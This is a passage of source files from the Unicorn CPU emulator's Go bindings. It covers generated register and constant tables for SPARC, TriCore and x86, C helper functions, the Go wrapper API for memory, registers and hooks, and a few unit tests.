CPU_SPARC64_ENDING = 17 // SPARC registers SPARC_REG_INVALID = 0 SPARC_REG_F0 = 1 SPARC_REG_F1 = 2 SPARC_REG_F2 = 3 SPARC_REG_F3 = 4 SPARC_REG_F4 = 5 SPARC_REG_F5 = 6 SPARC_REG_F6 = 7 SPARC_REG_F7 = 8 SPARC_REG_F8 = 9 SPARC_REG_F9 = 10 SPARC_REG_F10 = 11 SPARC_REG_F11 = 12 SPARC_REG_F12 = 13 SPARC_REG_F13 = 14 SPARC_REG_F14 = 15 SPARC_REG_F15 = 16 SPARC_REG_F16 = 17 SPARC_REG_F17 = 18 SPARC_REG_F18 = 19 SPARC_REG_F19 = 20 SPARC_REG_F20 = 21 SPARC_REG_F21 = 22 SPARC_REG_F22 = 23 SPARC_REG_F23 = 24 SPARC_REG_F24 = 25 SPARC_REG_F25 = 26 SPARC_REG_F26 = 27 SPARC_REG_F27 = 28 SPARC_REG_F28 = 29 SPARC_REG_F29 = 30 SPARC_REG_F30 = 31 SPARC_REG_F31 = 32 SPARC_REG_F32 = 33 SPARC_REG_F34 = 34 SPARC_REG_F36 = 35 SPARC_REG_F38 = 36 SPARC_REG_F40 = 37 SPARC_REG_F42 = 38 SPARC_REG_F44 = 39 SPARC_REG_F46 = 40 SPARC_REG_F48 = 41 SPARC_REG_F50 = 42 SPARC_REG_F52 = 43 SPARC_REG_F54 = 44 SPARC_REG_F56 = 45 SPARC_REG_F58 = 46 SPARC_REG_F60 = 47 SPARC_REG_F62 = 48 SPARC_REG_FCC0 = 49 SPARC_REG_FCC1 = 50 SPARC_REG_FCC2 = 51 SPARC_REG_FCC3 = 52 SPARC_REG_G0 = 53 SPARC_REG_G1 = 54 SPARC_REG_G2 = 55 SPARC_REG_G3 = 56 SPARC_REG_G4 = 57 SPARC_REG_G5 = 58 SPARC_REG_G6 = 59 SPARC_REG_G7 = 60 SPARC_REG_I0 = 61 SPARC_REG_I1 = 62 SPARC_REG_I2 = 63 SPARC_REG_I3 = 64 SPARC_REG_I4 = 65 SPARC_REG_I5 = 66 SPARC_REG_FP = 67 SPARC_REG_I7 = 68 SPARC_REG_ICC = 69 SPARC_REG_L0 = 70 SPARC_REG_L1 = 71 SPARC_REG_L2 = 72 SPARC_REG_L3 = 73 SPARC_REG_L4 = 74 SPARC_REG_L5 = 75 SPARC_REG_L6 = 76 SPARC_REG_L7 = 77 SPARC_REG_O0 = 78 SPARC_REG_O1 = 79 SPARC_REG_O2 = 80 SPARC_REG_O3 = 81 SPARC_REG_O4 = 82 SPARC_REG_O5 = 83 SPARC_REG_SP = 84 SPARC_REG_O7 = 85 SPARC_REG_Y = 86 SPARC_REG_XCC = 87 SPARC_REG_PC = 88 SPARC_REG_ENDING = 89 SPARC_REG_O6 = 84 SPARC_REG_I6 = 67 )unicorn-2.1.1/bindings/go/unicorn/tricore_const.go000066400000000000000000000054651467524106700223010ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.go] const ( // TRICORE CPU CPU_TRICORE_TC1796 = 0 CPU_TRICORE_TC1797 = 1 CPU_TRICORE_TC27X = 2 CPU_TRICORE_ENDING = 3 // TRICORE registers TRICORE_REG_INVALID = 0 TRICORE_REG_A0 = 1 TRICORE_REG_A1 = 2 TRICORE_REG_A2 = 3 TRICORE_REG_A3 = 4 TRICORE_REG_A4 = 5 TRICORE_REG_A5 = 6 TRICORE_REG_A6 = 7 TRICORE_REG_A7 = 8 TRICORE_REG_A8 = 9 TRICORE_REG_A9 = 10 TRICORE_REG_A10 = 11 TRICORE_REG_A11 = 12 TRICORE_REG_A12 = 13 TRICORE_REG_A13 = 14 TRICORE_REG_A14 = 15 TRICORE_REG_A15 = 16 TRICORE_REG_D0 = 17 TRICORE_REG_D1 = 18 TRICORE_REG_D2 = 19 TRICORE_REG_D3 = 20 TRICORE_REG_D4 = 21 TRICORE_REG_D5 = 22 TRICORE_REG_D6 = 23 TRICORE_REG_D7 = 24 TRICORE_REG_D8 = 25 TRICORE_REG_D9 = 26 TRICORE_REG_D10 = 27 TRICORE_REG_D11 = 28 TRICORE_REG_D12 = 29 TRICORE_REG_D13 = 30 TRICORE_REG_D14 = 31 TRICORE_REG_D15 = 32 TRICORE_REG_PCXI = 33 TRICORE_REG_PSW = 34 TRICORE_REG_PSW_USB_C = 35 TRICORE_REG_PSW_USB_V = 36 TRICORE_REG_PSW_USB_SV = 37 TRICORE_REG_PSW_USB_AV = 38 TRICORE_REG_PSW_USB_SAV = 39 TRICORE_REG_PC = 40 TRICORE_REG_SYSCON = 41 TRICORE_REG_CPU_ID = 42 TRICORE_REG_BIV = 43 TRICORE_REG_BTV = 44 TRICORE_REG_ISP = 45 TRICORE_REG_ICR = 46 TRICORE_REG_FCX = 47 TRICORE_REG_LCX = 48 TRICORE_REG_COMPAT = 49 TRICORE_REG_DPR0_U = 50 TRICORE_REG_DPR1_U = 51 TRICORE_REG_DPR2_U = 52 TRICORE_REG_DPR3_U = 53 TRICORE_REG_DPR0_L = 54 TRICORE_REG_DPR1_L = 55 TRICORE_REG_DPR2_L = 56 TRICORE_REG_DPR3_L = 57 TRICORE_REG_CPR0_U = 58 TRICORE_REG_CPR1_U = 59 TRICORE_REG_CPR2_U = 60 TRICORE_REG_CPR3_U = 61 TRICORE_REG_CPR0_L = 62 TRICORE_REG_CPR1_L = 63 TRICORE_REG_CPR2_L = 64 TRICORE_REG_CPR3_L = 65 TRICORE_REG_DPM0 = 66 TRICORE_REG_DPM1 = 67 TRICORE_REG_DPM2 = 68 TRICORE_REG_DPM3 = 69 TRICORE_REG_CPM0 = 70 TRICORE_REG_CPM1 = 71 TRICORE_REG_CPM2 = 72 TRICORE_REG_CPM3 = 73 TRICORE_REG_MMU_CON = 74 TRICORE_REG_MMU_ASI = 75 TRICORE_REG_MMU_TVA = 76 TRICORE_REG_MMU_TPA = 77 TRICORE_REG_MMU_TPX = 78 TRICORE_REG_MMU_TFA = 79 TRICORE_REG_BMACON = 80 TRICORE_REG_SMACON = 81 TRICORE_REG_DIEAR = 82 TRICORE_REG_DIETR = 83 TRICORE_REG_CCDIER = 84 TRICORE_REG_MIECON = 85 TRICORE_REG_PIEAR = 86 TRICORE_REG_PIETR = 87 TRICORE_REG_CCPIER = 88 TRICORE_REG_DBGSR = 89 TRICORE_REG_EXEVT = 90 TRICORE_REG_CREVT = 91 TRICORE_REG_SWEVT = 92 TRICORE_REG_TR0EVT = 93 TRICORE_REG_TR1EVT = 94 TRICORE_REG_DMS = 95 TRICORE_REG_DCX = 96 TRICORE_REG_DBGTCR = 97 TRICORE_REG_CCTRL = 98 TRICORE_REG_CCNT = 99 TRICORE_REG_ICNT = 100 TRICORE_REG_M1CNT = 101 TRICORE_REG_M2CNT = 102 TRICORE_REG_M3CNT = 103 TRICORE_REG_ENDING = 104 TRICORE_REG_GA0 = 1 TRICORE_REG_GA1 = 2 TRICORE_REG_GA8 = 9 TRICORE_REG_GA9 = 10 TRICORE_REG_SP = 11 TRICORE_REG_LR = 12 TRICORE_REG_IA = 16 TRICORE_REG_ID = 32 )unicorn-2.1.1/bindings/go/unicorn/uc.c000066400000000000000000000015771467524106700176500ustar00rootroot00000000000000#include #include #include "_cgo_export.h" uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count) { void **val_ref = malloc(sizeof(void *) * count); int i; for (i = 0; i < count; i++) { val_ref[i] = (void *)&val_out[i]; } uc_err ret = uc_reg_read_batch(handle, regs, val_ref, count); free(val_ref); return ret; } uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count) { void **val_ref = malloc(sizeof(void *) * count); int i; for (i = 0; i < count; i++) { val_ref[i] = (void *)&val_in[i]; } uc_err ret = uc_reg_write_batch(handle, regs, (void *const *)val_ref, count); free(val_ref); return ret; } uc_err uc_ctl_set_cpu_model_helper(uc_engine *handle, int model) { return uc_ctl_set_cpu_model(handle, model); } unicorn-2.1.1/bindings/go/unicorn/uc.h000066400000000000000000000003741467524106700176470ustar00rootroot00000000000000uc_err uc_reg_read_batch_helper(uc_engine *handle, int *regs, uint64_t *val_out, int count); uc_err uc_reg_write_batch_helper(uc_engine *handle, int *regs, uint64_t *val_in, int count); uc_err uc_ctl_set_cpu_model_helper(uc_engine *handle, int model); unicorn-2.1.1/bindings/go/unicorn/unicorn.go000066400000000000000000000145261467524106700210770ustar00rootroot00000000000000package unicorn import ( "runtime" "sync" "unsafe" ) /* #cgo CFLAGS: -O3 -Wall -Werror -I../../../include #cgo LDFLAGS: -L../../../ -lunicorn -Wl,-rpath,${SRCDIR}/../../../ #cgo linux LDFLAGS: -L../../../ -lunicorn -lrt -Wl,-rpath,${SRCDIR}/../../../ #include #include "uc.h" */ import "C" type UcError C.uc_err func (u UcError) Error() string { return C.GoString(C.uc_strerror(C.uc_err(u))) } func errReturn(err C.uc_err) error { if err != ERR_OK { return UcError(err) } return nil } type MemRegion struct { Begin, End uint64 Prot int } type Unicorn interface { MemMap(addr, size uint64) error MemMapProt(addr, size uint64, prot int) error MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error MemProtect(addr, size uint64, prot int) error MemUnmap(addr, size uint64) error MemRegions() ([]*MemRegion, error) MemRead(addr, size uint64) ([]byte, error) MemReadInto(dst []byte, addr uint64) error MemWrite(addr uint64, data []byte) error RegRead(reg int) (uint64, error) RegReadBatch(regs []int) ([]uint64, error) RegWrite(reg int, value uint64) error RegWriteBatch(regs []int, vals []uint64) error RegReadMmr(reg int) (*X86Mmr, error) RegWriteMmr(reg int, value *X86Mmr) error Start(begin, until uint64) error StartWithOptions(begin, until uint64, options *UcOptions) error Stop() error HookAdd(htype int, cb interface{}, begin, end uint64, extra ...int) (Hook, error) HookDel(hook Hook) error Query(queryType int) (uint64, error) Close() error ContextSave(reuse Context) (Context, error) ContextRestore(Context) error Handle() *C.uc_engine RegWriteX86Msr(reg uint64, val uint64) error RegReadX86Msr(reg uint64) (uint64, error) SetCPUModel(model int) error } type uc struct { handle *C.uc_engine final sync.Once hooks map[Hook]uintptr } type UcOptions struct { Timeout, Count uint64 } func Version() (int, int) { var major, minor C.uint C.uc_version(&major, &minor) return int(major), int(minor) } func NewUnicorn(arch, mode int) (Unicorn, error) { major, minor := Version() if major != C.UC_API_MAJOR || minor != C.UC_API_MINOR { return nil, UcError(ERR_VERSION) } var handle *C.uc_engine if ucerr := C.uc_open(C.uc_arch(arch), C.uc_mode(mode), &handle); ucerr != ERR_OK { return nil, UcError(ucerr) } u := &uc{handle: handle, hooks: make(map[Hook]uintptr)} runtime.SetFinalizer(u, func(u *uc) { u.Close() }) return u, nil } func (u *uc) Close() (err error) { u.final.Do(func() { if u.handle != nil { for _, uptr := range u.hooks { hookMap.remove(uptr) } u.hooks = nil err = errReturn(C.uc_close(u.handle)) u.handle = nil } }) return err } func (u *uc) StartWithOptions(begin, until uint64, options *UcOptions) error { ucerr := C.uc_emu_start(u.handle, C.uint64_t(begin), C.uint64_t(until), C.uint64_t(options.Timeout), C.size_t(options.Count)) return errReturn(ucerr) } func (u *uc) Start(begin, until uint64) error { return u.StartWithOptions(begin, until, &UcOptions{}) } func (u *uc) Stop() error { return errReturn(C.uc_emu_stop(u.handle)) } func (u *uc) RegWrite(reg int, value uint64) error { var val C.uint64_t = C.uint64_t(value) ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) return errReturn(ucerr) } func (u *uc) RegRead(reg int) (uint64, error) { var val C.uint64_t ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) return uint64(val), errReturn(ucerr) } func (u *uc) RegWriteBatch(regs []int, vals []uint64) error { if len(regs) == 0 { return nil } if len(vals) < len(regs) { regs = regs[:len(vals)] } cregs := make([]C.int, len(regs)) for i, v := range regs { cregs[i] = C.int(v) } cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) ucerr := C.uc_reg_write_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) return errReturn(ucerr) } func (u *uc) RegReadBatch(regs []int) ([]uint64, error) { if len(regs) == 0 { return nil, nil } cregs := make([]C.int, len(regs)) for i, v := range regs { cregs[i] = C.int(v) } cregs2 := (*C.int)(unsafe.Pointer(&cregs[0])) vals := make([]uint64, len(regs)) cvals := (*C.uint64_t)(unsafe.Pointer(&vals[0])) ucerr := C.uc_reg_read_batch_helper(u.handle, cregs2, cvals, C.int(len(regs))) return vals, errReturn(ucerr) } func (u *uc) MemRegions() ([]*MemRegion, error) { var regions *C.uc_mem_region var count C.uint32_t ucerr := C.uc_mem_regions(u.handle, ®ions, &count) if ucerr != C.UC_ERR_OK { return nil, errReturn(ucerr) } ret := make([]*MemRegion, count) tmp := (*[1 << 24]C.struct_uc_mem_region)(unsafe.Pointer(regions))[:count] for i, v := range tmp { ret[i] = &MemRegion{ Begin: uint64(v.begin), End: uint64(v.end), Prot: int(v.perms), } } C.uc_free(unsafe.Pointer(regions)) return ret, nil } func (u *uc) MemWrite(addr uint64, data []byte) error { if len(data) == 0 { return nil } return errReturn(C.uc_mem_write(u.handle, C.uint64_t(addr), unsafe.Pointer(&data[0]), C.size_t(len(data)))) } func (u *uc) MemReadInto(dst []byte, addr uint64) error { if len(dst) == 0 { return nil } return errReturn(C.uc_mem_read(u.handle, C.uint64_t(addr), unsafe.Pointer(&dst[0]), C.size_t(len(dst)))) } func (u *uc) MemRead(addr, size uint64) ([]byte, error) { dst := make([]byte, size) return dst, u.MemReadInto(dst, addr) } func (u *uc) MemMapProt(addr, size uint64, prot int) error { return errReturn(C.uc_mem_map(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) } func (u *uc) MemMap(addr, size uint64) error { return u.MemMapProt(addr, size, PROT_ALL) } func (u *uc) MemMapPtr(addr, size uint64, prot int, ptr unsafe.Pointer) error { return errReturn(C.uc_mem_map_ptr(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot), ptr)) } func (u *uc) MemProtect(addr, size uint64, prot int) error { return errReturn(C.uc_mem_protect(u.handle, C.uint64_t(addr), C.size_t(size), C.uint32_t(prot))) } func (u *uc) MemUnmap(addr, size uint64) error { return errReturn(C.uc_mem_unmap(u.handle, C.uint64_t(addr), C.size_t(size))) } func (u *uc) Query(queryType int) (uint64, error) { var ret C.size_t ucerr := C.uc_query(u.handle, C.uc_query_type(queryType), &ret) return uint64(ret), errReturn(ucerr) } func (u *uc) Handle() *C.uc_engine { return u.handle } func (u *uc) SetCPUModel(model int) error { ucerr := C.uc_ctl_set_cpu_model_helper(u.handle, C.int(model)) return errReturn(ucerr) } unicorn-2.1.1/bindings/go/unicorn/unicorn_const.go000066400000000000000000000054511467524106700223020ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.go] const ( API_MAJOR = 2 API_MINOR = 1 API_PATCH = 0 API_EXTRA = 255 VERSION_MAJOR = 2 VERSION_MINOR = 1 VERSION_PATCH = 0 VERSION_EXTRA = 255 SECOND_SCALE = 1000000 MILISECOND_SCALE = 1000 ARCH_ARM = 1 ARCH_ARM64 = 2 ARCH_MIPS = 3 ARCH_X86 = 4 ARCH_PPC = 5 ARCH_SPARC = 6 ARCH_M68K = 7 ARCH_RISCV = 8 ARCH_S390X = 9 ARCH_TRICORE = 10 ARCH_MAX = 11 MODE_LITTLE_ENDIAN = 0 MODE_BIG_ENDIAN = 1073741824 MODE_ARM = 0 MODE_THUMB = 16 MODE_MCLASS = 32 MODE_V8 = 64 MODE_ARMBE8 = 1024 MODE_ARM926 = 128 MODE_ARM946 = 256 MODE_ARM1176 = 512 MODE_MICRO = 16 MODE_MIPS3 = 32 MODE_MIPS32R6 = 64 MODE_MIPS32 = 4 MODE_MIPS64 = 8 MODE_16 = 2 MODE_32 = 4 MODE_64 = 8 MODE_PPC32 = 4 MODE_PPC64 = 8 MODE_QPX = 16 MODE_SPARC32 = 4 MODE_SPARC64 = 8 MODE_V9 = 16 MODE_RISCV32 = 4 MODE_RISCV64 = 8 ERR_OK = 0 ERR_NOMEM = 1 ERR_ARCH = 2 ERR_HANDLE = 3 ERR_MODE = 4 ERR_VERSION = 5 ERR_READ_UNMAPPED = 6 ERR_WRITE_UNMAPPED = 7 ERR_FETCH_UNMAPPED = 8 ERR_HOOK = 9 ERR_INSN_INVALID = 10 ERR_MAP = 11 ERR_WRITE_PROT = 12 ERR_READ_PROT = 13 ERR_FETCH_PROT = 14 ERR_ARG = 15 ERR_READ_UNALIGNED = 16 ERR_WRITE_UNALIGNED = 17 ERR_FETCH_UNALIGNED = 18 ERR_HOOK_EXIST = 19 ERR_RESOURCE = 20 ERR_EXCEPTION = 21 ERR_OVERFLOW = 22 MEM_READ = 16 MEM_WRITE = 17 MEM_FETCH = 18 MEM_READ_UNMAPPED = 19 MEM_WRITE_UNMAPPED = 20 MEM_FETCH_UNMAPPED = 21 MEM_WRITE_PROT = 22 MEM_READ_PROT = 23 MEM_FETCH_PROT = 24 MEM_READ_AFTER = 25 TCG_OP_SUB = 0 TCG_OP_FLAG_CMP = 1 TCG_OP_FLAG_DIRECT = 2 HOOK_INTR = 1 HOOK_INSN = 2 HOOK_CODE = 4 HOOK_BLOCK = 8 HOOK_MEM_READ_UNMAPPED = 16 HOOK_MEM_WRITE_UNMAPPED = 32 HOOK_MEM_FETCH_UNMAPPED = 64 HOOK_MEM_READ_PROT = 128 HOOK_MEM_WRITE_PROT = 256 HOOK_MEM_FETCH_PROT = 512 HOOK_MEM_READ = 1024 HOOK_MEM_WRITE = 2048 HOOK_MEM_FETCH = 4096 HOOK_MEM_READ_AFTER = 8192 HOOK_INSN_INVALID = 16384 HOOK_EDGE_GENERATED = 32768 HOOK_TCG_OPCODE = 65536 HOOK_TLB_FILL = 131072 HOOK_MEM_UNMAPPED = 112 HOOK_MEM_PROT = 896 HOOK_MEM_READ_INVALID = 144 HOOK_MEM_WRITE_INVALID = 288 HOOK_MEM_FETCH_INVALID = 576 HOOK_MEM_INVALID = 1008 HOOK_MEM_VALID = 7168 QUERY_MODE = 1 QUERY_PAGE_SIZE = 2 QUERY_ARCH = 3 QUERY_TIMEOUT = 4 CTL_IO_NONE = 0 CTL_IO_WRITE = 1 CTL_IO_READ = 2 CTL_IO_READ_WRITE = 3 TLB_CPU = 0 TLB_VIRTUAL = 1 CTL_UC_MODE = 0 CTL_UC_PAGE_SIZE = 1 CTL_UC_ARCH = 2 CTL_UC_TIMEOUT = 3 CTL_UC_USE_EXITS = 4 CTL_UC_EXITS_CNT = 5 CTL_UC_EXITS = 6 CTL_CPU_MODEL = 7 CTL_TB_REQUEST_CACHE = 8 CTL_TB_REMOVE_CACHE = 9 CTL_TB_FLUSH = 10 CTL_TLB_FLUSH = 11 CTL_TLB_TYPE = 12 CTL_TCG_BUFFER_SIZE = 13 CTL_CONTEXT_MODE = 14 PROT_NONE = 0 PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 PROT_ALL = 7 CTL_CONTEXT_CPU = 1 CTL_CONTEXT_MEMORY = 2 )unicorn-2.1.1/bindings/go/unicorn/unicorn_test.go000066400000000000000000000027271467524106700221360ustar00rootroot00000000000000package unicorn import ( "testing" ) func TestMemUnmap(t *testing.T) { mu, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } if err := mu.MemMap(0x1000, 0x1000); err != nil { t.Fatal(err) } tmp := make([]byte, 1024) if err := mu.MemWrite(0x1000, tmp); err != nil { t.Fatal(err) } if err := mu.MemUnmap(0x1000, 0x1000); err != nil { t.Fatal(err) } if err := mu.MemWrite(0x1000, tmp); err.(UcError) != ERR_WRITE_UNMAPPED { t.Fatalf("Expected ERR_WRITE_UNMAPPED, got: %v", err) } } func TestDoubleClose(t *testing.T) { mu, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } if err := mu.Close(); err != nil { t.Fatal(err) } if err := mu.Close(); err != nil { t.Fatal(err) } } func TestMemRegions(t *testing.T) { mu, err := NewUnicorn(ARCH_X86, MODE_32) if err != nil { t.Fatal(err) } err = mu.MemMap(0x1000, 0x1000) if err != nil { t.Fatal(err) } regions, err := mu.MemRegions() if err != nil { t.Fatal(err) } if len(regions) != 1 { t.Fatalf("returned wrong number of regions: %d != 1", len(regions)) } r := regions[0] if r.Begin != 0x1000 || r.End != 0x1fff || r.Prot != 7 { t.Fatalf("incorrect region: %#v", r) } } func TestQuery(t *testing.T) { mu, err := NewUnicorn(ARCH_ARM, MODE_THUMB) if err != nil { t.Fatal(err) } mode, err := mu.Query(QUERY_MODE) if err != nil { t.Fatal(err) } if mode != MODE_THUMB { t.Fatalf("query returned invalid mode: %d != %d", mode, MODE_THUMB) } } unicorn-2.1.1/bindings/go/unicorn/x86.go000066400000000000000000000024141467524106700200400ustar00rootroot00000000000000package unicorn import ( "unsafe" ) // #include // #include import "C" type X86Mmr struct { Selector uint16 Base uint64 Limit uint32 Flags uint32 } func (u *uc) RegWriteMmr(reg int, value *X86Mmr) error { var val C.uc_x86_mmr val.selector = C.uint16_t(value.Selector) val.base = C.uint64_t(value.Base) val.limit = C.uint32_t(value.Limit) val.flags = C.uint32_t(value.Flags) ucerr := C.uc_reg_write(u.handle, C.int(reg), unsafe.Pointer(&val)) return errReturn(ucerr) } func (u *uc) RegReadMmr(reg int) (*X86Mmr, error) { var val C.uc_x86_mmr ucerr := C.uc_reg_read(u.handle, C.int(reg), unsafe.Pointer(&val)) ret := &X86Mmr{ Selector: uint16(val.selector), Base: uint64(val.base), Limit: uint32(val.limit), Flags: uint32(val.flags), } return ret, errReturn(ucerr) } func (u *uc) RegWriteX86Msr(reg uint64, val uint64) error { msr := C.uc_x86_msr{ rid: C.uint32_t(reg), value: C.uint64_t(val), } return errReturn(C.uc_reg_write(u.handle, X86_REG_MSR, unsafe.Pointer(&msr))) } func (u *uc) RegReadX86Msr(reg uint64) (uint64, error) { msr := C.uc_x86_msr{ rid: C.uint32_t(reg), } ucerr := C.uc_reg_read(u.handle, X86_REG_MSR, unsafe.Pointer(&msr)) return uint64(msr.value), errReturn(ucerr) } unicorn-2.1.1/bindings/go/unicorn/x86_const.go000066400000000000000000001076421467524106700212570ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.go] const ( // X86 CPU CPU_X86_QEMU64 = 0 CPU_X86_PHENOM = 1 CPU_X86_CORE2DUO = 2 CPU_X86_KVM64 = 3 CPU_X86_QEMU32 = 4 CPU_X86_KVM32 = 5 CPU_X86_COREDUO = 6 CPU_X86_486 = 7 CPU_X86_PENTIUM = 8 CPU_X86_PENTIUM2 = 9 CPU_X86_PENTIUM3 = 10 CPU_X86_ATHLON = 11 CPU_X86_N270 = 12 CPU_X86_CONROE = 13 CPU_X86_PENRYN = 14 CPU_X86_NEHALEM = 15 CPU_X86_WESTMERE = 16 CPU_X86_SANDYBRIDGE = 17 CPU_X86_IVYBRIDGE = 18 CPU_X86_HASWELL = 19 CPU_X86_BROADWELL = 20 CPU_X86_SKYLAKE_CLIENT = 21 CPU_X86_SKYLAKE_SERVER = 22 CPU_X86_CASCADELAKE_SERVER = 23 CPU_X86_COOPERLAKE = 24 CPU_X86_ICELAKE_CLIENT = 25 CPU_X86_ICELAKE_SERVER = 26 CPU_X86_DENVERTON = 27 CPU_X86_SNOWRIDGE = 28 CPU_X86_KNIGHTSMILL = 29 CPU_X86_OPTERON_G1 = 30 CPU_X86_OPTERON_G2 = 31 CPU_X86_OPTERON_G3 = 32 CPU_X86_OPTERON_G4 = 33 CPU_X86_OPTERON_G5 = 34 CPU_X86_EPYC = 35 CPU_X86_DHYANA = 36 CPU_X86_EPYC_ROME = 37 CPU_X86_ENDING = 38 // X86 registers X86_REG_INVALID = 0 X86_REG_AH = 1 X86_REG_AL = 2 X86_REG_AX = 3 X86_REG_BH = 4 X86_REG_BL = 5 X86_REG_BP = 6 X86_REG_BPL = 7 X86_REG_BX = 8 X86_REG_CH = 9 X86_REG_CL = 10 X86_REG_CS = 11 X86_REG_CX = 12 X86_REG_DH = 13 X86_REG_DI = 14 X86_REG_DIL = 15 X86_REG_DL = 16 X86_REG_DS = 17 X86_REG_DX = 18 X86_REG_EAX = 19 X86_REG_EBP = 20 X86_REG_EBX = 21 X86_REG_ECX = 22 X86_REG_EDI = 23 X86_REG_EDX = 24 X86_REG_EFLAGS = 25 X86_REG_EIP = 26 X86_REG_ES = 28 X86_REG_ESI = 29 X86_REG_ESP = 30 X86_REG_FPSW = 31 X86_REG_FS = 32 X86_REG_GS = 33 X86_REG_IP = 34 X86_REG_RAX = 35 X86_REG_RBP = 36 X86_REG_RBX = 37 X86_REG_RCX = 38 X86_REG_RDI = 39 X86_REG_RDX = 40 X86_REG_RIP = 41 X86_REG_RSI = 43 X86_REG_RSP = 44 X86_REG_SI = 45 X86_REG_SIL = 46 X86_REG_SP = 47 X86_REG_SPL = 48 X86_REG_SS = 49 X86_REG_CR0 = 50 X86_REG_CR1 = 51 X86_REG_CR2 = 52 X86_REG_CR3 = 53 X86_REG_CR4 = 54 X86_REG_CR8 = 58 X86_REG_DR0 = 66 X86_REG_DR1 = 67 X86_REG_DR2 = 68 X86_REG_DR3 = 69 X86_REG_DR4 = 70 X86_REG_DR5 = 71 X86_REG_DR6 = 72 X86_REG_DR7 = 73 X86_REG_FP0 = 82 X86_REG_FP1 = 83 X86_REG_FP2 = 84 X86_REG_FP3 = 85 X86_REG_FP4 = 86 X86_REG_FP5 = 87 X86_REG_FP6 = 88 X86_REG_FP7 = 89 X86_REG_K0 = 90 X86_REG_K1 = 91 X86_REG_K2 = 92 X86_REG_K3 = 93 X86_REG_K4 = 94 X86_REG_K5 = 95 X86_REG_K6 = 96 X86_REG_K7 = 97 X86_REG_MM0 = 98 X86_REG_MM1 = 99 X86_REG_MM2 = 100 X86_REG_MM3 = 101 X86_REG_MM4 = 102 X86_REG_MM5 = 103 X86_REG_MM6 = 104 X86_REG_MM7 = 105 X86_REG_R8 = 106 X86_REG_R9 = 107 X86_REG_R10 = 108 X86_REG_R11 = 109 X86_REG_R12 = 110 X86_REG_R13 = 111 X86_REG_R14 = 112 X86_REG_R15 = 113 X86_REG_ST0 = 114 X86_REG_ST1 = 115 X86_REG_ST2 = 116 X86_REG_ST3 = 117 X86_REG_ST4 = 118 X86_REG_ST5 = 119 X86_REG_ST6 = 120 X86_REG_ST7 = 121 X86_REG_XMM0 = 122 X86_REG_XMM1 = 123 X86_REG_XMM2 = 124 X86_REG_XMM3 = 125 X86_REG_XMM4 = 126 X86_REG_XMM5 = 127 X86_REG_XMM6 = 128 X86_REG_XMM7 = 129 X86_REG_XMM8 = 130 X86_REG_XMM9 = 131 X86_REG_XMM10 = 132 X86_REG_XMM11 = 133 X86_REG_XMM12 = 134 X86_REG_XMM13 = 135 X86_REG_XMM14 = 136 X86_REG_XMM15 = 137 X86_REG_XMM16 = 138 X86_REG_XMM17 = 139 X86_REG_XMM18 = 140 X86_REG_XMM19 = 141 X86_REG_XMM20 = 142 X86_REG_XMM21 = 143 X86_REG_XMM22 = 144 X86_REG_XMM23 = 145 X86_REG_XMM24 = 146 X86_REG_XMM25 = 147 X86_REG_XMM26 = 148 X86_REG_XMM27 = 149 X86_REG_XMM28 = 150 X86_REG_XMM29 = 151 X86_REG_XMM30 = 152 X86_REG_XMM31 = 153 X86_REG_YMM0 = 154 X86_REG_YMM1 = 155 X86_REG_YMM2 = 156 X86_REG_YMM3 = 157 X86_REG_YMM4 = 158 X86_REG_YMM5 = 159 X86_REG_YMM6 = 160 X86_REG_YMM7 = 161 X86_REG_YMM8 = 162 X86_REG_YMM9 = 163 X86_REG_YMM10 = 164 X86_REG_YMM11 = 165 X86_REG_YMM12 = 166 X86_REG_YMM13 = 167 X86_REG_YMM14 = 168 X86_REG_YMM15 = 169 X86_REG_YMM16 = 170 X86_REG_YMM17 = 171 X86_REG_YMM18 = 172 X86_REG_YMM19 = 173 X86_REG_YMM20 = 174 X86_REG_YMM21 = 175 X86_REG_YMM22 = 176 X86_REG_YMM23 = 177 X86_REG_YMM24 = 178 X86_REG_YMM25 = 179 X86_REG_YMM26 = 180 X86_REG_YMM27 = 181 X86_REG_YMM28 = 182 X86_REG_YMM29 = 183 X86_REG_YMM30 = 184 X86_REG_YMM31 = 185 X86_REG_ZMM0 = 186 X86_REG_ZMM1 = 187 X86_REG_ZMM2 = 188 X86_REG_ZMM3 = 189 X86_REG_ZMM4 = 190 X86_REG_ZMM5 = 191 X86_REG_ZMM6 = 192 X86_REG_ZMM7 = 193 X86_REG_ZMM8 = 194 X86_REG_ZMM9 = 195 X86_REG_ZMM10 = 196 X86_REG_ZMM11 = 197 X86_REG_ZMM12 = 198 X86_REG_ZMM13 = 199 X86_REG_ZMM14 = 200 X86_REG_ZMM15 = 201 X86_REG_ZMM16 = 202 X86_REG_ZMM17 = 203 X86_REG_ZMM18 = 204 X86_REG_ZMM19 = 205 X86_REG_ZMM20 = 206 X86_REG_ZMM21 = 207 X86_REG_ZMM22 = 208 X86_REG_ZMM23 = 209 X86_REG_ZMM24 = 210 X86_REG_ZMM25 = 211 X86_REG_ZMM26 = 212 X86_REG_ZMM27 = 213 X86_REG_ZMM28 = 214 X86_REG_ZMM29 = 215 X86_REG_ZMM30 = 216 X86_REG_ZMM31 = 217 X86_REG_R8B = 218 X86_REG_R9B = 219 X86_REG_R10B = 220 X86_REG_R11B = 221 X86_REG_R12B = 222 X86_REG_R13B = 223 X86_REG_R14B = 224 X86_REG_R15B = 225 X86_REG_R8D = 226 X86_REG_R9D = 227 X86_REG_R10D = 228 